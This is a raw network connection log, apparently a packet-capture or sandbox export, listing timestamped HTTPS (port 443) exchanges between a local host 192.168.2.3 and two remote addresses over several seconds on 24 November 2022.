Nov 24, 2022 12:21:15.917784929 CET	49884	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:15.917818069 CET	443	49884	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.007535934 CET	49886	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.007576942 CET	443	49886	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.007664919 CET	49886	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.008114100 CET	49886	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.008126020 CET	443	49886	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.008177996 CET	443	49886	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.044106960 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.044162989 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.044280052 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.046896935 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.046935081 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.105194092 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.106084108 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.107177973 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.107199907 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.115828037 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.115854979 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.139722109 CET	49888	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.139765978 CET	443	49888	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.139970064 CET	49888	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.140161037 CET	49888	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.140182018 CET	443	49888	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.140285015 CET	443	49888	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.230288982 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.232496023 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.232536077 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.236579895 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.297446012 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.297596931 CET	443	49887	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.297708988 CET	49887	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.410326958 CET	49889	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.410438061 CET	443	49889	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.413438082 CET	49889	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.413638115 CET	49889	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.413685083 CET	443	49889	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.413822889 CET	443	49889	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.504847050 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.504903078 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.504976034 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.518568039 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.518625975 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.569525957 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.569698095 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.582813978 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.582844019 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.583547115 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.586596966 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.587639093 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.587670088 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.626435995 CET	49891	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.626501083 CET	443	49891	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.628489017 CET	49891	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.628694057 CET	49891	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.628724098 CET	443	49891	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.628782034 CET	443	49891	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.672748089 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.672837973 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.672863007 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.676410913 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.679886103 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.680094004 CET	443	49890	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.680296898 CET	49890	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.806196928 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.806256056 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.806385994 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.812594891 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.812638998 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.844142914 CET	49893	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.844202995 CET	443	49893	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.844444990 CET	49893	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.844659090 CET	49893	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:16.844669104 CET	443	49893	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.844818115 CET	443	49893	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:16.862171888 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.862397909 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.896004915 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.896039963 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.896742105 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.901237011 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.901849031 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.901871920 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.974473000 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.974611998 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:16.974744081 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.977591038 CET	49892	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:16.977632999 CET	443	49892	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.067904949 CET	49894	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.067955971 CET	443	49894	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.068139076 CET	49894	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.068351030 CET	49894	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.068371058 CET	443	49894	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.068432093 CET	443	49894	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.118483067 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.118541956 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.122486115 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.123370886 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.123404980 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.168451071 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.168545961 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.175564051 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.175585985 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.178901911 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.178949118 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.234530926 CET	49896	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.234575987 CET	443	49896	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.234680891 CET	49896	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.234873056 CET	49896	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.234911919 CET	443	49896	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.234997034 CET	443	49896	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.292450905 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.292555094 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.292587042 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.292610884 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.292669058 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.292817116 CET	49895	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.292844057 CET	443	49895	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.407090902 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.407174110 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.407294035 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.407632113 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.407671928 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.436618090 CET	49898	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.436688900 CET	443	49898	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.436814070 CET	49898	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.437016010 CET	49898	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.437036991 CET	443	49898	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.437107086 CET	443	49898	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.453531027 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.453768969 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.462456942 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.462476015 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.465615988 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.465645075 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.571824074 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.572005033 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.572041035 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.572097063 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.578216076 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.578355074 CET	443	49897	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:17.578459978 CET	49897	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:17.688312054 CET	49899	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.688368082 CET	443	49899	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.688437939 CET	49899	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.688642979 CET	49899	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:17.688661098 CET	443	49899	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:17.688728094 CET	443	49899	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.002238035 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.002285004 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.002392054 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.004566908 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.004585028 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.077716112 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.077877998 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.097485065 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.097511053 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.097970963 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.098120928 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.098681927 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.098694086 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.107456923 CET	49901	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.107542992 CET	443	49901	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.107650995 CET	49901	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.107857943 CET	49901	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.107887030 CET	443	49901	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.107984066 CET	443	49901	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.267520905 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.267616987 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.267846107 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.267865896 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.300721884 CET	49900	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.300755978 CET	443	49900	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.435648918 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.435714960 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.435878038 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.436849117 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.436872959 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.437238932 CET	49903	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.437289953 CET	443	49903	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.437381029 CET	49903	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.437520981 CET	49903	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.437532902 CET	443	49903	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.437572002 CET	443	49903	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.487495899 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.487683058 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.539437056 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.539494038 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.542503119 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.542560101 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.659384012 CET	49904	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.659449100 CET	443	49904	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.659554005 CET	49904	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.659780979 CET	49904	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:18.659806967 CET	443	49904	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.659845114 CET	443	49904	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:18.686321020 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.686409950 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:18.686517000 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.687781096 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.751949072 CET	49902	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:18.751985073 CET	443	49902	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.379478931 CET	49905	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:19.379518986 CET	443	49905	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:19.379636049 CET	49905	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:19.379903078 CET	49905	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:19.379919052 CET	443	49905	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:19.379972935 CET	443	49905	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:19.593951941 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.594012976 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.594131947 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.640142918 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.640181065 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.691504002 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.691663980 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.735454082 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.735483885 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.740304947 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.740330935 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.781908989 CET	49907	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:19.781955004 CET	443	49907	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:19.782056093 CET	49907	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:19.782268047 CET	49907	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:19.782282114 CET	443	49907	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:19.782329082 CET	443	49907	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:19.801294088 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.801493883 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:19.801527023 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:19.801585913 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:20.024038076 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:20.024147987 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:20.024257898 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:20.024296045 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:20.721894026 CET	49906	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:20.721951008 CET	443	49906	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:20.897552013 CET	49908	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:20.897605896 CET	443	49908	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:20.898705006 CET	49908	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:20.898705006 CET	49908	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:20.898751974 CET	443	49908	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:20.898916960 CET	443	49908	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:20.994076967 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:20.994163990 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:20.994323969 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.004281998 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.004322052 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.049479961 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.049550056 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.050457954 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.050481081 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.053461075 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.053487062 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.096640110 CET	49910	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.096694946 CET	443	49910	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.096854925 CET	49910	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.097017050 CET	49910	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.097034931 CET	443	49910	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.097100973 CET	443	49910	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.222145081 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.222239017 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.222238064 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.222286940 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.222467899 CET	49909	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.222507000 CET	443	49909	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.333636045 CET	49911	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.333703041 CET	443	49911	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.333816051 CET	49911	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.333988905 CET	49911	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.334000111 CET	443	49911	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.334096909 CET	443	49911	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.406919956 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.406989098 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.407486916 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.423183918 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.423223019 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.468913078 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.469083071 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.471349001 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.471381903 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.474627018 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.474663973 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.577652931 CET	49913	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.577718019 CET	443	49913	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.577817917 CET	49913	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.578062057 CET	49913	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.578084946 CET	443	49913	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.578140020 CET	443	49913	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.594269991 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.594465971 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.594504118 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.594566107 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.602953911 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.603075027 CET	443	49912	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.603163958 CET	49912	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.723200083 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.723253965 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.723356962 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.724139929 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.724158049 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.773677111 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.773874044 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.780958891 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.780982018 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.781907082 CET	49915	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.781955957 CET	443	49915	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.782066107 CET	49915	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.782332897 CET	49915	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.782352924 CET	443	49915	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.782403946 CET	443	49915	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.782591105 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.782675028 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.783498049 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.783514977 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.949661016 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.949786901 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.949805975 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.949861050 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.949870110 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.949918032 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.949925900 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.949979067 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.950623989 CET	49914	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:21.950639963 CET	443	49914	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:21.999596119 CET	49916	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.999643087 CET	443	49916	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:21.999727011 CET	49916	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.999947071 CET	49916	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:21.999962091 CET	443	49916	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.000015020 CET	443	49916	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.087996006 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.088051081 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.088150024 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.089067936 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.089098930 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.135356903 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.135546923 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.136543989 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.136559963 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.141222000 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.141252995 CET	443	49917	172.66.43.60	192.168.2.3
